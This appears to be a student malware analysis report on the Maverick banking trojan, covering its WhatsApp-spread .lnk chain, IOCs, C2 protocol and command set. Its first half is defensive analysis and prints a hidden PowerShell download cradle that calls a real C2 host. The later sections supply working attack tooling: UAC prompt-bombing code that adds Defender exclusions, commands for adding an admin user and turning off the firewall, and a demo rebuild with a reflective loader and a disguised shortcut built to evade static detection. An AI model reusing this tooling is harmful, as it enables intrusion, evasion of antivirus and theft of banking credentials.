``` AT19N0116 Phan Huy Hoang AT19N0119 Le Ba Quoc Khanh AT19N0123 Truong Hoang Lan AT19N0140 Thai Nhut Tien AT19N0145 Nguyen Ngoc Tu AT19N0153 Hoang Lam ``` # Maverick ## ref - https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/ - https://simplificandoredes.com/en/maverick-malwarewhatsapp/ - https://www.trendmicro.com/ru_ru/research/25/j/self-propagating-malware-spreads-via-whatsapp.html ## IOCs - Get sample Malware: [MalwareBazaar](https://bazaar.abuse.ch/browse/tag/Maverick/) > passzip: ``infected`` > make sure to checksum before analyse - Get sample .lnk: [zip](https://upfile.live/vi/files/c9e62c4f) > passzip: ``infected`` | SHA256 | Tags | |:------------------------------------------------------------------ |:---------------------------------------------------------------------------------------------------- | | `25de3ba7ee0a0f4db696b92359f1e14f5a01e1e680ad85905246c657a382fd62` | `banker` `exe` `Maverick` | | `8350a241a40045b04bacdd0f2d013a702adfc3dc530d303af4d3f6c94e614b4f` | `ArmDot` `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` | | `3dfb21deb61a9b772f28699ae8ad376b6ed26c11de47fe6e0cd59fc252995a53` | `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` | | `06ddb29639e875fed71185e02fd477964e2aab0082f923ac36533a86a4c56e53` | `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` | | `543e044c972183d7edbb566f729687822b19d0b78bee39965799ccb9532553fa` | `banker` `casadecampoamazonas-com` `exe` `Maverick` `sorvetenopote-com` `tropicalexecutivehotel-com` | | `a6b33f3d366f38c0529a7e956cae2c784356095c039af985c29ded1f639b75a2` | `banker` `casadecampoamazonas-com` `exe` `Maverick` `sorvetenopote-com` `tropicalexecutivehotel-com` | | `5f2b3891b3f6fd1271bbafa7af4213283c1573b107d7ad167273a01d1b5966e0` | `arenahamburguer-com` `casadecampoamazonas-com` `exe` `expansivebot-com` `Maverick` | ## Introduce This report analyzes a set of samples labeled “Maverick” (see IOCs) to document observed behavior, extract actionable indicators, and provide detection and mitigation guidance for defenders. Based on internal notes and preliminary telemetry, the campaign appears to be targeting **Brazil** **Primary target sector (likely):** - Individual users and small-to-medium businesses (SMBs) that may be exposed to email or download-based social engineering. **Primary target geography:** - **Brazil** (inferred). *Note:* this inference is based on internal reporting; the report documents the evidence used to support the Brazil attribution. **Primary target OS:** - **Microsoft Windows** — inferred from delivery via `.lnk` shortcuts and PE-format executables. **Scope of the report:** Static analysis of provided samples, extraction of IOCs (hashes, domains, IPs, mutexes), mapping of observed techniques to MITRE ATT&CK, and production of starter detection artifacts (YARA, Sigma, Splunk). ## Compare to Coyote https://securelist.com/coyote-multi-stage-banking-trojan/111846/ | Category | Coyote | Maverick | | ---------------- | ------------------- | --------------------------- | | **Target** | Global | Mainly Brazil | | **Vector** | Email phishing | WhatsApp Web propagation | | **Obfuscation** | Donut packer | ArmDot (.NET) | | **Architecture** | Simple, monolithic | Modular (Stage1–2–Agent) | | **Persistence** | Registry / Task | Multi-layer persistence | | **C2** | Static HTTP domains | Encrypted, rotating domains | | **Evasion** | Basic | Anti-VM, Anti-debug | | **Goal** | Credential theft | Credential theft + spread | ## Initial infection vector  > infection chain  > instruction from attacker > ``“Display is allowed only on computers. If you are using the Chrome browser, you may be prompted to ‘Keep’ the file, because it is a zipped file.”`` - WhatsApp is a popular, well-known and cross-platform application, why attacker/scamer need our computer? - So obviously that is suspect thing we must concerned about  ## Stage 1 - Before extract ``.zip``, the WinDef can detect it as Worm  - So to analyse this file, it's better to temporary turn off WinDef and perform the task in Virtual Machine  > shortcut of cmd.exe :::spoiler base64 ``` TAAAAAEUAgAAAAAAwAAAAAAAAEY1AAAAAAAAAICHHD7sMtwBgIccPuwy3AGAhxw+7DLcAQAAAAAA AAAABwAAAAAAAAAAAAAAAAAAABUBFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAA AAAAAAAAAAAALgAxAAAAAABBW2NnEABDOgAAHAADAAQA775BW2NnQVtjZxQAAABDADoAAAASADwA MQAAAAAAQVtjZxAAV2luZG93cwAmAAMABADvvkFbY2dBW2NnFAAAAFcAaQBuAGQAbwB3AHMAAAAW AEAAMQAAAAAAQVtjZxAAU3lzdGVtMzIAACgAAwAEAO++QVtjZ0FbY2cUAAAAUwB5AHMAdABlAG0A MwAyAAAAGAA8ADIAAAAAAEFbY2cQAGNtZC5leGUAJgADAAQA775BW2NnQVtjZxQAAABjAG0AZAAu AGUAeABlAAAAFgAAABUAU3lzdGVtVXBkYXRlXzVmMzNjOGE2FABDOlxXaW5kb3dzXFN5c3RlbTMy XIsCL1dNUlg6RjBFIC9XRlhJOkJOWUU1UyAvRC9DICJmb3IgJW8gaW4gKC0pIGRvIGZvciAlYSBp biAocCkgZG8gZm9yICVPIGluIChlbGwuKSBkbyBmb3IgJVQgaW4gKCJCWUFHTUFhQUJzQUVNQVpB QkRBRlFBYlFBM0FHNEFjZ0JVQUVjQWJnQnFBRGNBYUFCTUFGRUFVZ0JUQUhBQU13QnBBSGNBSndB cEFBPT0iKSBkbyBmb3IgJWwgaW4gKCJrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElB YVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBY3dBNkFDOEFMd0JsQUhnQWNBQmgiKSBkbyBmb3IgJUog aW4gKGV4ZSkgZG8gZm9yICVtIGluIChoaWQpIGRvIGZvciAlcCBpbiAoIlNRQkZBRmdBSUFBb0FF NEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJPQUdVQWRBQXVBRmNBWlFCaUFFTUFiQUJwQUdV QWJnQjBBQyIpIGRvIGZvciAlQiBpbiAoLWUpIGRvIGZvciAlTCBpbiAoZXJzaCkgZG8gZm9yICVV IGluICh3KSBkbyBmb3IgJUQgaW4gKHcpIGRvIGZvciAleCBpbiAobykgZG8gZm9yICV3IGluICgi QUc0QWN3QnBBSFlBWlFCMUFITUFaUUJ5QUM0QVl3QnZBRzBBTHdCaEFIQUFhUUF2QUdrQWRBQmlB R2tBTHdCSUFIRUFVQUJIQURVQVp3IikgZG8gZm9yICVRIGluIChuYykgZG8gJWEleCVVJUwlTyVK ICVvJUQgJW0gJUIlUSAlfnAlfmwlfnclflQiAAAAAA== ``` ::: > or you can use my base64 for integrity  - It a shortcut of cmd.exe with some args lists: ``/D/C`` :::spoiler explain ``/D`` Disable execution of AutoRun commands from registry ``/C`` Carries out the command specified by string and then terminates  ::: - What it finally does: ``do %a%x%U%L%O%J %o%D %m %B%Q %~p%~l%~w%~T`` - Args is combination of multiple obfuscate vars - First part ``for %o in (-) do`` --> ``%o`` = ``-`` ``for %a in (p) do`` --> ``%a`` = `p` ``for %O in (ell.) do`` --> ``%O`` = ``ell.`` ``for %J in (exe) do`` --> ``%J`` = ``exe`` ``for %m in (hid) do`` --> ``%m`` = ``hid`` ``for %B in (-e) do`` --> ``%B`` = ``-e`` ``for %L in (ersh) do`` --> ``%L`` = ``ersh`` ``for %U in (w) do`` --> ``%U`` = ``w`` ``for %D in (w) do`` --> ``%D`` = ``w`` ``for %x in (o) do`` --> ``%x`` = ``o`` ``for %Q in (nc) do`` --> ``%Q`` = ``nc`` ``%a%x%U%L%O%J %o%D %m %B%Q`` ``powershell.exe -w hid -enc`` > ``-w hid`` : ``-WindowStyle Hidden`` > ``-enc`` : ``-EncodedCommand`` - Second part ``` do for %T in ("BYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA==") ``` ``` do for %l in ("kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh") ``` ``` do for %p in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC") ``` ``` do for %w in ("AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZw") ``` ``do %a%x%U%L%O%J %o%D %m %B%Q %~p%~l%~w%~T`` - Concatenated String: ``%~p%~l%~w%~T`` `` SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABhAG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZwBYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA== ``  > PowerShell support encode/decode only UTF-16LE > which using tags ``-enc`` in part1 ``` IEX (New-Object Net.WebClient).DownloadString('https://expansiveuser.com/api/itbi/HqPG5gXchlCdCTm7nrTGnj7hLQRSp3iw') ``` - Final Deobfuscated Command: ``powershell.exe -w hid -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABhAG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZwBYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA==`` > which is > ``powershell.exe -w hid IEX (New-Object Net.WebClient).DownloadString('https://expansiveuser.com/api/itbi/HqPG5gXchlCdCTm7nrTGnj7hLQRSp3iw')`` - Attacker prefer to use .lnk file as an execute method because some AV or EDR not carefully checked like it does with .exe > bypass basic defender - Now we pretty sure the malware was built for Windows only > .lnk, cmd.exe, powershell > and .NET framework loader is in the following sections  ## Stage 2 - After execute above PowerShell script, contact to C2 and download another PowerShell script - But due to the link is down because of malicious activites so let analyse base on docs  - This is the first layer defense from C2 server, which is configured to check the "**User-Agent**" header. The request must originate from a customized PowerShell script (where the User-Agent may be hard-coded in PowerShell script *Stage2*), otherwise the C2 server return a 401 Unauthorized response > an anti-analyse or anti-sandbox method that simplify denied non-verified like `wget`, `curl`, ... to download next payload, force to execute .lnk file to get whole payload - The entry script attempts to decode an embedded .NET file, and this process occurs entirely in memory without writing any files to disk > by simply deviding each byte by a specific value (in this case, "174") > --> which make the infection fileless - Then using ``[System.Reflection.Assembly]::Load()`` to reflective load :::spoiler example ```ps1 $bytes = ... # Load the assembly into memory $assembly = [System.Reflection.Assembly]::Load($bytes) # Optionally invoke a method from the loaded assembly $type = $assembly.GetType("Namespace.ClassName") $method = $type.GetMethod("MethodName") $method.Invoke($null, @("arg1", "arg2")) ``` ::: > perhap in this script can easily bypass [amsi](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) before ## Stage 3 > Fileless Execution and Loader Deployment ### .NET loader - Entrypoint:  > Using obfuscate method: Control Flow Flattening :::spoiler exmaple Control Flow Flattening https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening - From this ```c #include <stdlib.h> int main(int argc, char** argv) { int a = atoi(argv[1]); if(a == 0) return 1; else return 10; return 0; } ``` - To this ```c #include <stdlib.h> int main(int argc, char** argv) { int a = atoi(argv[1]); int b = 0; while(1) { switch(b) { case 0: if(a == 0) b = 1; else b = 2; break; case 1: return 1; case 2: return 10; default: break; } } return 0; } ``` ::: - Using indirect function calls via ptr mangle > ex:  > store various ptr address IntPtr inside vector/arr, lookup via index > combine with above obfuscate make reversing harder - Perform Random queue sleep, check TimeZone, DateTime, etc... >  - Communicate with C2 via exposed API on the route "/api/v1"  > ``https://sorvetenopote[.]com/api/v1/3d045ada0df942c983635e`` > ``https://zapgrande[.]com/api/v1/19230d53a96d4facbead047f645e02b8`` > ... various C2 URL server - Applied HMAC-Authentication by use custom request header field ``"X-Request-Headers"`` with value is the API key > or ``"X-Request-Hash"`` in other payload - And the API key is dynamically calculated locally using following algorithm ``Base64(HMAC256(Key))`` - HMAC secret key: ``MaverickZapBot2025SecretKey12345`` (hard-coded) - Signed Data: ``3d045ada0df942c983635e|1759847631|MaverickBot`` > yub, another anti-analyse method as we mentioned above   - After authentication, C2 response back 2 encrypted payload shellcode - WhatsApp Infector : "spread mechanism" - Final payload (also called "MaverickBanker") : "data steal mechanism"  :::spoiler Analyse Shellcode - The encrypted shellcode is a loader using Donut > an opensource project that can generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory > https://github.com/TheWover/donut - Combine along with custom XOR method > Last 4 byte (Int32) indicate the sizeof(key) > The key is the consequent byte before the 4-byte size (offset = filesize-4) > The raw payload is the remain (filesize - 4 - keysize) ex: ``0x01 0x02 0x03 0x04 ... 0xFF 0xEF 0xBE 0xAD 0xDE 0x04 0x00 0x00 0x00`` ``0x01 0x02 0x03 0x04 ... 0xFF|0xEF 0xBE 0xAD 0xDE|0x04 0x00 0x00 0x00`` ``{--------raw payload-------}|{-----Key_XOR-----}|{-----KeySize-----}`` ::: - The concept of spliting the attack chain into two main branches is a strategic design that allows attacker to update or change individual components without refactoring or affecting the others, thereby increasing the campaign's resilience and adaptability ## WhatsApp Infector Module > I can't find Maverick.StageOne 🤷‍♂️  - This payload focuses entirely on self-propagation of the malware - It first load another downloader - same obfuscation method above - Then that downloader download another .NET assembly and loaded it as a extend module > diff: not an encrypted Donut shellcode  - The module have a namespace ``ZAP`` include itself a script from [WPPConnect](https://github.com/wppconnect-team/wppconnect), an open-source use for interact and control WhatsApp Web, as well as [Selenium](https://www.selenium.dev/downloads/) use for web automation - It locates the WhatsApp window in the browser, hijacks the session using WPPConnect and automatically sends malicious messages to victim's contacts, resulting in a completed infection loop ## MaverickBanker ### Maverick - Trojan - namespace Maverick.StageTwo  - Entrypoint do ``RegisterStartup()``  - Do register persistence (if not already present) by checking for a pre-existing obfuscated ``.bat`` file :::spoiler - Inspect "StartUp" folder for a batch file > ``Environment.SpecialFolder.Startup`` - Perform a pattern match > contained specific signature logic ``"for %%"`` and ``" in ("`` - If no matching, generate file name ``"HealthApp-{6-char_GUID}.bat"`` - And content is generate by ``Program.GenerateObfuscaedBatCommand(string url)`` > which url is combination of: >  > “hxxps://sorvetenopote.com” + “/api/itbi/startup/” + Guid.NewGuid().ToString("N")  > the same batch file downloaded from the ``.lnk`` file ::: - After that, call task worker ``MonitorBrowserUrl()``  > ``for(;;)`` loop monitor the foreground window (window in focus) to find the way communicate to C2 :::spoiler ``Program.GetActiveBrowserUrl()`` - Get current tab bank web browser window  > perform check "chrome", "firefox", "msedge", "brave", "iexplore" > also include hard-coded `"navegador exclusivo bradesco"` (Bradesco's exclusive browser) and return `"banco.bradesco"` if detected ::: :::spoiler ``Program.DecryptDomain(string base64)`` - Decode base64 and decrypt using AES-256-CBC the ``string @base`` which contain various target online banking sites and return as Dictionary  > IV is first 16 byte > Key is next 32 byte  - Then it is stored in a global variable, and a nullability check is performed to avoid decoding it again   ::: :::spoiler ``Program.CheckDomainTarget()`` - Utilizing domain URL matching against a set of rules and return s structured result  > Return type: ``ValueTuple<bool, int, string>`` > Early return when param is null or empty string > Using regex expresion to match certain URL domains > Using ``HashSet`` for fast lookups ::: - If a match is found, continue to decrypt another PE file embeded as a hard-coded bytes array. The decrypted payload is then loaded directly into memory using ``Assembly.Load()`` - Once loaded, it locates the entrypoint of the assembly and create a delegate to invoke it  ### Maverick - Agent - This PE seem look like act as a Client, by looking at Class naming  - The entrypoint targets Brazil only:  :::spoiler ``AntiAnalysisBrazil.IsSuspiciousEnvironment()``  - Perfrom check four criteria: timezone, locale, region and date format  ::: - Next, establishes C2 comunication chanel by enabling DPI awareness to ensure appropiate display scaling > `DpiUtils.EnableDpiAwareness()` - Then check any running persistence file store in `\Start Menu\Programs\` > `Program.OnlyOneFileInStartup()` > if more than one file found, keep the newest and delete the rest by checking `GetCreationTime` - And subsequently instantiates a WatsonClient that connects to the malicious server over port 443 (HTTPS) > ``adoblesecuryt[.]com`` > ``casadecampoamazonas[.]com`` > ... ### C2 Communication ```csharp using System; namespace Maverick.Agent { // Token: 0x02000005 RID: 5 public enum CommandTypes { // Token: 0x04000012 RID: 18 INFOCLIENT, // Token: 0x04000013 RID: 19 RECONNECT, // Token: 0x04000014 RID: 20 REBOOT, // Token: 0x04000015 RID: 21 KILLAPPLICATION, // Token: 0x04000016 RID: 22 SCREENSHOT, // Token: 0x04000017 RID: 23 KEYLOGGER, // Token: 0x04000018 RID: 24 MOUSECLICK, // Token: 0x04000019 RID: 25 KEYBOARDONECHAR, // Token: 0x0400001A RID: 26 KEYBOARDMULTIPLESCHARS, // Token: 0x0400001B RID: 27 GETMODULE, // Token: 0x0400001C RID: 28 TOOGLEDESKTOP, // Token: 0x0400001D RID: 29 TOOGLEINTERN, // Token: 0x0400001E RID: 30 GENERATEWINDOWLOCKED, // Token: 0x0400001F RID: 31 FREECLIENT, // Token: 0x04000020 RID: 32 LISTALLHANDLESOPENEDS, // Token: 0x04000021 RID: 33 KILLPROCESS, // Token: 0x04000022 RID: 34 CLOSEHANDLE, // Token: 0x04000023 RID: 35 MINIMIZEHANDLE, // Token: 0x04000024 RID: 36 MAXIMIZEHANDLE, // Token: 0x04000025 RID: 37 RESTOREHANDLE, // Token: 0x04000026 RID: 38 GENERATEWINDOWREQUEST, // Token: 0x04000027 RID: 39 CANCELSCREENREQUEST, // Token: 0x04000028 RID: 40 DATATEXTRECEIVED, // Token: 0x04000029 RID: 41 CHANGESCALETO100, // Token: 0x0400002A RID: 42 ADJUST_QUALITY, // Token: 0x0400002B RID: 43 ADJUST_SCALE } } ``` - Send in a struct/class ```csharp using System; using System.Runtime.CompilerServices; using System.Threading.Tasks; using WatsonTcp; namespace Maverick.Agent { // Token: 0x0200000D RID: 13 public static class CommandSender { // Token: 0x06000044 RID: 68 RVA: 0x00002898 File Offset: 0x00000A98 public static Task SendToServer(WatsonTcpClient client, CommandTypes command, byte[] parameters = null) { CommandSender.<SendToServer>d__0 <SendToServer>d__; <SendToServer>d__.<>t__builder = AsyncTaskMethodBuilder.Create(); <SendToServer>d__.client = client; <SendToServer>d__.command = command; <SendToServer>d__.parameters = parameters; <SendToServer>d__.<>1__state = -1; <SendToServer>d__.<>t__builder.Start<CommandSender.<SendToServer>d__0>(ref <SendToServer>d__); return <SendToServer>d__.<>t__builder.Task; } } } ``` # UAC Prompt Bombing http://esentire.com/blog/new-botnet-emerges-from-the-shadows-nightshadec2 https://github.com/eSentire/iocs/blob/main/Nightshade/SandboxBypass/Program.cs - force user run as administrator > cannot denied, take over control UAC ## code ### ps1 ```ps1 try { throw "" } catch { while ( -not $? ) { try { Start-Process cmd.exe -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } } ``` - stealthier: https://lolbas-project.github.io/ ```ps1 try { throw "" } catch { while ( -not $? ) { try { Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } } ``` - Flatten + Encrypt: ```ps1 try { throw "" } catch { while ( -not $? ) { try { Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } } ``` - cyberchef > encode UTF16LE, base64 run powershell with enc base64: ```bash powershell -e dAByAHkAIAB7ACAAdABoAHIAbwB3ACAAIgAiACAAfQAgAGMAYQB0AGMAaAAgAHsAIAB3AGgAaQBsAGUAIAAoACAALQBuAG8AdAAgACQAPwAgACkAIAB7ACAAdAByAHkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHcAbAByAG0AZAByAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAtAHMAIAAzADYAMAAwACAALQBmACAAMAAgAC0AdAAgAF8AIAAtAG0AIABfACAALQBhACAAMQAxACAALQB1ACAAYwBtAGQALgBlAHgAZQAiACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQAgAH0A ``` ### C# ```csharp while (true) { try { Process powershellProcess = new Process(); powershellProcess.StartInfo.FileName = "powershell.exe"; powershellProcess.StartInfo.UseShellExecute = true; powershellProcess.StartInfo.Verb = "runas"; powershellProcess.StartInfo.CreateNoWindow = true; powershellProcess.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; powershellProcess.StartInfo.Arguments = "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"" + " try { if (Get-Command Add-MpPreference -ErrorAction SilentlyContinue) { Add-MpPreference -ExclusionPath '" + exclusionFolderPath + "' -Force; Add-MpPreference -ExclusionPath '" + exclusionFileFolderPath + "' -Force; Add-MpPreference -ExclusionProcess '" + exclusionFilePath + "' -Force; } } catch { } \""; powershellProcess.Start(); powershellProcess.WaitForExit(); int exitCode = powershellProcess.ExitCode; if (exitCode == 0) { break; } } catch { continue; } } ``` ## exploit :::info What Hacker do with CMD as Administrator? ::: - Create new administrative user account > maintain access even if the initial exploit is patched. ``net user username password /add`` ``net localgroup administrators username /add`` - Modify system settings / Registry > ensure malicious programs run automatically at startup - Disable / Modify security (AV or firewall) ``netsh advfirewall set allprofiles state off`` - Encrypt / Delete critical file > act like ransomeware or sabotage - Edit critical file > eg: C:\Windows\System32\drivers\etc\hosts - etc... # DEMO - https://github.com/trhoanglan204/DemoMaverick ## C2 Server - for simplify, combine WebAPI with WebApp - UI interact with multi client  ## Client .NET - perform action prompted by server ### Maverick.Agent - Console App .NET framework 4.8 (.exe) for test and develop ### Maverick.Load - Class Library .NET framework 4.8 (.dll) for load reflection ### Maverick.Template - WinApp .NET Core 9.0 (.exe) native AOT build - Can fake resource and icon to impersonate a legit application ## ps1 loader - For demo, the dll will simplify encoded by base64 ```ps1 $__PayloadTemplate__ = @" __PAYLOAD_B64__ "@ $__NewtonSoft__ = @" __DLL_NEWTONSOFT_B64__ "@ [System.Reflection.Assembly]::Load([Convert]::FromBase64String($__NewtonSoft__)) $__Assembly__ = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($__PayloadTemplate__)) $__Entry__ = $__Assembly__.EntryPoint if ($__Entry__ -ne $null) { $__paramCount__ = $__Entry__.GetParameters().Count if($__paramCount__ -eq 0) { $__Entry__.Invoke($null, @()) } else { $__argsArray__ = [string[]]@() $__Entry__.Invoke($null, @($__argsArray__)) } } else { $__type__ = $__Assembly__.GetType("Maverick.Agent.Program") if ($__type__ -eq $null) { throw "Type Program not found" } $__meth__ = $__type__.GetMethod("Main") if ($__meth__ -eq $null) { throw "Method Main not found" } $__meth__.Invoke($null, @()) } ``` > If use dll payload, we must hardcode the Assembly.GetType + .GetMethod > that why we have to obfuscate even on variable and function naming > But if we use .NET exe, just find Entrypoint then .Invoke directly (note that can't work with native AOT) ## shortcut .lnk - Note that if use the same template like Maverick, after create shortcut, WinDef statically detected it - So instead that, for demo purpose, I will use directly powershell ```ps1 $shortcutPath = "$env:USERPROFILE\Desktop\Credential Guard.lnk" $targetPath = "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe" $arguments = '-w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA4ADAAMAAwAC8AYQBwAGkALwBpAG4AaQB0AC8ANABkADYAMQA3ADQANABlADYAMQA2ADkANAAzADYAOAA2ADEANAAzADYAOAA2ADEANAAzADYAOAA2ADEAJwApAA==' $workingDir = "$env:WINDIR\System32" $WshShell = New-Object -ComObject WScript.Shell $shortcut = $WshShell.CreateShortcut($shortcutPath) $shortcut.TargetPath = $targetPath $shortcut.Arguments = $arguments $shortcut.WorkingDirectory = $workingDir $shortcut.IconLocation = "$targetPath,0" $shortcut.Save() ``` --> bypass static detect ## Android payload - For enhance platform, why don't we make a payload for android? https://drive.google.com/file/d/1HrfI7FGMLMYW6cZSkE4GbQm5r08L6KFh/view?usp=sharing